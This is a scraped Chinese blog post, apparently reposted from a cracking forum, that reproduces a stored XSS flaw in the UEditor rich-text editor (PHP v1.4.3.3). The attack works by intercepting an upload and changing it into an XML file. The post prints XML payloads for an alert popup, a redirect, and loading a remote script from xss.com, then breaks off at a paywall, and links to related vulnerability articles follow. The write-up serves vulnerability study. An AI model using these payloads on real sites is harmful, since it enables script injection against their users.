大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

最新推荐文章于 2023-07-07 22:30:00 发布
最新推荐文章于 2023-07-07 22:30:00 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: 逆向分析 逆向工程 软件脱壳 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaotuge_always/article/details/118053182
版权
本文详细介绍了Ueditor富文本编辑器在php版v1.4.3.3中的XML文件上传导致的存储型XSS漏洞,包括复现步骤、影响版本及.NET、PHP版本的文件上传漏洞,以及SSRF和另一处XSS漏洞。黑客可利用这些漏洞上传木马文件,执行命令控制服务器。
摘要由CSDN通过智能技术生成

一、Ueditor最新版XML文件上传导致存储型XSS

测试版本:php版 v1.4.3.3

下载地址:https://github.com/fex-team/ueditor 复现步骤:

1. 上传一个图片文件

在这里插入图片描述

2. 然后buprsuit抓包拦截

在这里插入图片描述

3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可

在这里插入图片描述

4. 即可弹出xss

在这里插入图片描述

请注意http://controller.xxx的访问路径

http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

在这里插入图片描述

常见的xml弹窗POC:

弹窗xss:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>

URL跳转:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>

远程加载Js:

<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>

常用的上传路径&

最低0.47元/天 解锁文章
大神论坛
关注
专栏目录
【甲方安全建设】富文本编辑器XSS漏洞攻击及防御详析
等风来
08-31 2356
随着Web 2.0技术的普及,富文本编辑器在各种Web应用中得到了广泛应用,用户、网站管理员等可以通过富文本编辑器在网页中添加并展示格式化文本、图片、视频等丰富内容。然而,由于富文本内容本质上涉及客户端输入,并且可能包含HTML、JavaScript等代码,处理不当时容易引发跨站脚本攻击(XSS)。
ueditor插件文件上传实现
G_honey的博客
12-23 929
1.首先加依赖(对MultipartFile的支持) commons-fileupload commons-fileupload 1.3.1 2.配置mvc.xml文件 3.导入插件所需的问件(包含webuploader和ueditor,前者是包含于后者的) 4.在前台页面导入js,css jQuery
UeditorXML文件上传导致存储XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 8189
UEditor 富文本web编辑器最新漏洞XML文件上传导致存储XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新XML文件上传导致存储XSS 测试本:phpv1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类改为uploadfile,并修改文件后...
html标签%3cp%3e,大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储XSS...
weixin_29421565的博客
06-22 1378
大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储XSS原创159768610802021-06-19 15:42:59©著作权©著作权归作者所有:来自51CTO博客作者15976861080的原创作品,如需转载,请注明出处,否则将追究法律责任https://blog.51cto.com/u_11440330/2927412## **一、Ueditor最新XML文件上...
XML所引起的xss攻击
https://www.cnblogs.com/zpchcbd/
10-15 4702
利用条件: 1、满足同源策略 test.jpg <?xml version="1.0" encoding="iso-8859-1"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <ht...
富文本编辑器漏洞
weixin_33851604的博客
09-11 1571
.net 一般的富文本编辑器都是使用 一般处理程序上传图片或者文件的 那么黑客就可以利用开发者的疏忽(没有判断权限) 直接通过伪造表单上传经过他更改过的木马文件 伪装成.jpg(各种图片格式)。 提交 上传完成之后只要访问一下这个路径(上传完成后会返回)以上就是没有加权限判断导致的。任何人都能通过富文本编辑器上传文件为了防止这样事情的发生,我们做一下调整 我...
UEditor 富文本 web 编辑器
11-23
UEditor是一款由百度FEX前端研发团队开发的高性能、易使用的富文本Web编辑器。它以其轻量级、高度可定制以及对用户体验的重视而受到广大开发者和网站管理员的青睐。UEditor遵循MIT协议,这意味着它对用户是完全开放...
YII中Ueditor富文本编辑器文件和图片上传的配置图文教程
12-18
在本文中,我们将深入探讨如何在YII框架中配置Ueditor富文本编辑器,以便实现文件和图片的上传功能。Ueditor是一款强大的在线文本编辑工具,它可以方便地嵌入到各种Web应用中,提供丰富的编辑功能。以下是详细的配置...
UEditor富文本编辑器实现图片/视频/表情包/文字发布
05-30
使用百度UEditor富文本编辑器实现发布新闻/通知公告/编写个人任务等在线编辑功能。解决了图片的发布,视频的发布以及图片和视频存储路径的自定义路径。
UEditor富文本编辑器的静态资源部分
10-25
**UEditor富文本编辑器**是一款广泛应用于Web开发中的强大编辑工具,由百度公司开发,提供了丰富的API和自定义功能,使得开发者可以轻松地在网页上实现文本编辑、格式化、图片上传等功能。本资源包主要包含UEditor的...
html 编辑器编码漏洞,某富文本编辑器文件上传漏洞(小论如何控制IsPostBack的值) | CN-SEC 中文网...
weixin_39826984的博客
06-18 279
在这个文本编辑器上没有找到任何按钮是可以直接上传文件的(只有插入文件上传按钮,没啥用),但是代码里面是隐藏有这样一个功能的:code 区域protected override void RenderContents(HtmlTextWriter output){if (this.Page.IsPostBack) //判断是否第一次访问,这个是小的关键点{//if there is an uploa...
Ueditor百度编辑器JSP
06-05
Ueditor百度编辑器JSP本,图片附件上传通过测试好用。
挖洞经验|UEditor编辑器存储XSS漏洞
MachineGunJoe666
05-29 3795
前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞,此漏洞已经上报,由于技术略菜,有分析不到位的还请多多见谅。 漏洞成因分析 漏洞文件产生在前端配置文件ueditor.config.js: 以下为纯文本粘贴为true时的过滤规则,对一些危险的标签没有做过滤,怪不得好多二次开发的。 //纯文本粘贴模式下的过滤规则 //'filterT
java文件上传存储到服务器上_Ueditor最新XML文件上传导致存储XSS
weixin_39693193的博客
11-25 617
上个月测试某个系统碰到了,以为是0day,Google了下发现早已有人发过了。见:https://blog.csdn.net/qq_39101049/article/details/97684968下载源码并搭建环境测试本:php v1.4.3.3,jsp(当时忘了看本)下载地址:https://github.com/fex-team/ueditorIP:192.168.10.1...
修复富文本编辑器引起的XSS安全问题
weixin_45394033的博客
10-24 3272
在平时使用的富文本编辑器中也会存在恶意输入JS脚本使用js-xss 对文本进行过滤,删除掉可能存在的脚本富文本形式输入脚本的形式是 存储xss,提交的数据存在脚本,并且保存成功。其他人访问当前页面就会触发开启httponly(禁止JS获取Cookie)输入过滤,输出转义。
UEditor v1.4.3.3 .net本任意文件上传 漏洞复现
最新发布
Boom!脑洞大爆炸的博客
07-07 7172
UEditor v1.4.3.3 .net本任意文件上传 漏洞复现
UEditor上传导致 XSS漏洞自动化实现POC_基于POCsuite3
afei001
07-16 722
UEditor上传导致 XSS漏洞自动化实现POC_基于POCsuite3
Ueditot_jsp SSRF漏洞复现
afei001
04-09 1060
目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响本 5.漏洞等级 6.漏洞复现 6.1 FAFO实战复现 6.2 Ueditor_SSRF_jsp-env_POC.py 7.漏洞修复 1.前言 今天在某项目对网站渗透测试时,发现某子域使用了Ueditor。百度Google发现其历史本是有漏洞的,jsp环境的Ueditor存在SSRF,aspx环境的存在文件上传,竟然碰到了,就对该SSRF进行复现学习。 2.漏洞概述 该编辑器v1.4....
富文本编辑器 xss 攻击的解决
热门推荐
ISaiSai的专栏
03-10 1万+
普通xss 攻击,通过html 转意就可以很好地解决但是富文本编辑器,本身就是允许输入html 标签的,不能转义需要引入第三方防止xss的包来处理,对文章内html 进行处 参考文章:http://jsxss.com/zh/starter/quickstart.html
Node.js后台集成UEditor富文本编辑器步骤解析
UEditor是由百度开发的Web前端富文本编辑器,它具有轻量级、可定制和用户友好的特点,并且遵循MIT开源协议。集成过程包括下载UEditor的Node.js本,将公共目录下的文件复制到项目静态资源目录,创建ueditor文件夹,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大神论坛

喜欢作者

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值